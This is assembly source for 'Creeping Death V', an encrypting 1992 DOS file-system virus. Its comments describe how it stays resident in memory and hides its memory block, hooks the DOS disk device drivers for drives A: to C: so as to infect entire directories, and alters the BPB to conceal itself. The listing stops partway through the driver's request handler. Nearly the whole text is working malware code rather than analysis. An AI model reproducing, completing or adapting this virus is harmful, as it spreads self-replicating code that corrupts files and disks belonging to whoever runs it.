;*****************************************************************************;
; ;
; Creeping Death V (Encrypting, try to find it) ;
; (Version 4 bug Fixed) ;
; (c) Copyright 1992 by Bit Addict ;
; ;
;*****************************************************************************;
code segment public 'code'
assume cs:code, ds:code, es:code
org 5ch
;*****************************************************************************;
; ;
; Data ;
; ;
;*****************************************************************************;
BPB_Buf: db 32 dup(?) ; buffer for BPB
EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
Request equ this dword ; address of the request header
RequestOffset dw ?
RequestSegment dw ?
org 100h
;*****************************************************************************;
; ;
; Actual start of virus. In this part the virus initializes the stack and ;
; adjusts the device driver used by dos to read and write from floppies and ;
; hard disks. Then it will start the original exe or com-file ;
; ;
;*****************************************************************************;
Encrypt: mov si,offset Main-1
mov cx,400h-11
Repeat: xor byte ptr [si],0
inc si
loop Repeat
Main: mov sp,600h ; init stack
inc Counter
;*****************************************************************************;
; ;
; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
; si will be -1 ;
; ;
;*****************************************************************************;
DosVersion: mov ah,30h ; fn 30h = Get Dosversion
int 21h ; int 21h
cmp al,4 ; major dosversion
sbb di,di
mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,??
;*****************************************************************************;
; ;
; Adjust the size of the codesegment, with dos function 4ah ;
; ;
;*****************************************************************************;
mov bx,60h ; Adjust size of memory block
mov ah,4ah ; to 60 paragraphs = 600h bytes
int 21h ; int 21h
mov ah,52h ; get internal list of lists
int 21h ; int 21h
;*****************************************************************************;
; ;
; If the virus code segment is located behind the dos config memory block the ;
; code segment will be part of the config memory block making it 61h ;
; paragraphs larger. If the virus is not located next to the config memory ;
; block the virus will set the owner to 8h (Dos system) ;
; ;
;*****************************************************************************;
mov ax,es:[bx-2] ; segment of first MCB
mov dx,cs ; dx = MCB of the code segment
dec dx
NextMCB: mov ds,ax ; ax = segment next MCB
add ax,ds:[3]
inc ax
cmp ax,dx ; are they equal ?
jne NextMCB ; no, not 1st program executed
cmp word ptr ds:[1],8
jne NoBoot
add word ptr ds:[3],61h ; add 61h to size of block
NoBoot: mov ds,dx ; ds = segment of MCB
mov word ptr ds:[1],8 ; owner = dos system
;*****************************************************************************;
; ;
; The virus will search for the disk parameter block for drive a: - c: in ;
; order to find the device driver for these block devices. If any of these ;
; blocks is found the virus will install its own device driver and set the ;
; access flag to -1 to tell dos this device hasn't been accessed yet. ;
; ;
;*****************************************************************************;
cld ; clear direction flag
lds bx,es:[bx] ; get pointer to first drive
; parameter block
Search: cmp bx,-1 ; last block ?
je Last
mov ax,ds:[bx+di+15h] ; get segment of device header
cmp ax,70h ; dos device header ??
jne Next ; no, go to next device
xchg ax,cx
mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
; has not been accessed"
mov si,offset Header-4 ; set address of new device
xchg si,ds:[bx+di+13h] ; and save old address
mov ds:[bx+di+15h],cs
Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
jmp Search
;*****************************************************************************;
; ;
; If the virus has failed in starting the original exe-file it will jump here. ;
; ;
;*****************************************************************************;
Boot: mov ds,ds:[16h] ; es = parent PSP
mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
xor si,si
sub bx,1
jnb Exec
mov ax,cs
dec ax
mov ds,ax
mov cx,8
mov si,8
mov di,0ffh
Count: lodsb
or al,al
loopne Count
not cx
and cx,7
NextByte: mov si,8
inc di
push di
push cx
rep cmpsb
pop cx
pop di
jne NextByte
BeginName: dec di
cmp byte ptr es:[di-1],0
jne BeginName
mov si,di
mov bx,es
jmp short Exec
;*****************************************************************************;
; ;
; If none of these devices is found it means the virus is already resident ;
; and the virus wasn't able to start the original exe-file (the file is ;
; corrupted by copying it without the virus memory resident). If the device ;
; is found the information in the header is copied. ;
; ;
;*****************************************************************************;
Last: jcxz Exit
;*****************************************************************************;
; ;
; The information about the dos device driver is copied to the virus code ;
; segment ;
; ;
;*****************************************************************************;
mov ds,cx ; ds = segment of Device Driver
add si,4
push cs
pop es
mov di,offset Header
movsw
lodsw
mov es:StrBlock,ax
mov ax,offset Strategy
stosw
lodsw
mov es:IntBlock,ax
mov ax,offset Interrupt
stosw
movsb
;*****************************************************************************;
; ;
; Deallocate the environment memory block and start this file again, but ;
; if the virus succeeds it will start the original exe-file. ;
; ;
;*****************************************************************************;
push cs
pop ds
mov bx,ds:[2ch] ; environment segment
or bx,bx ; =0 ?
jz Boot
mov es,bx
mov ah,49h ; deallocate memory
int 21h
xor ax,ax
mov di,1
Seek: dec di ; scan for end of environment
scasw
jne Seek
lea si,ds:[di+2] ; es:si = start of filename
Exec: push bx
push cs
pop ds
mov bx,offset Param
mov ds:[bx+4],cs ; set segments in EPB
mov ds:[bx+8],cs
mov ds:[bx+12],cs
pop ds
push cs
pop es
mov di,offset f_name ; copy name of this file
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh ; open file, this file will
mov dx,offset File ; not be found but the entire
int 21h ; directory is searched and
pop dx ; infected
mov ax,4b00h ; execute file
int 21h
Exit: mov ah,4dh ; get exit-code
int 21h
mov ah,4ch ; terminate (al = exit code)
int 21h
;*****************************************************************************;
; ;
; Installation complete ;
; ;
;*****************************************************************************;
; ;
; The next part contains the device driver used by creeping death to infect ;
; directories ;
; ;
; The device driver uses only the strategy routine to handle the requests. ;
; I don't know if this is because the virus will work better or the writer ;
; of this virus didn't know how to do it right. ;
; ;
;*****************************************************************************;
Strategy: mov cs:RequestOffset,bx
mov cs:RequestSegment,es
retf
Interrupt: push ax ; driver strategy block
push bx
push cx ; save registers
push dx
push si
push di
push ds
push es
les bx,cs:Request
push es
pop ds
mov al,ds:[bx+2] ; Command Code
cmp al,4 ; Input
je Input
cmp al,8 ; Output
je Output
cmp al,9
je Output
call DoRequest
cmp al,2 ; Build BPB
jne Return
lds si,ds:[bx+12h] ; copy the BPB and change it
mov di,offset bpb_buf ; into one that hides the virus
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es ; copy
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,ds:[di+2-32] ; change
cmp al,2
adc al,0
cbw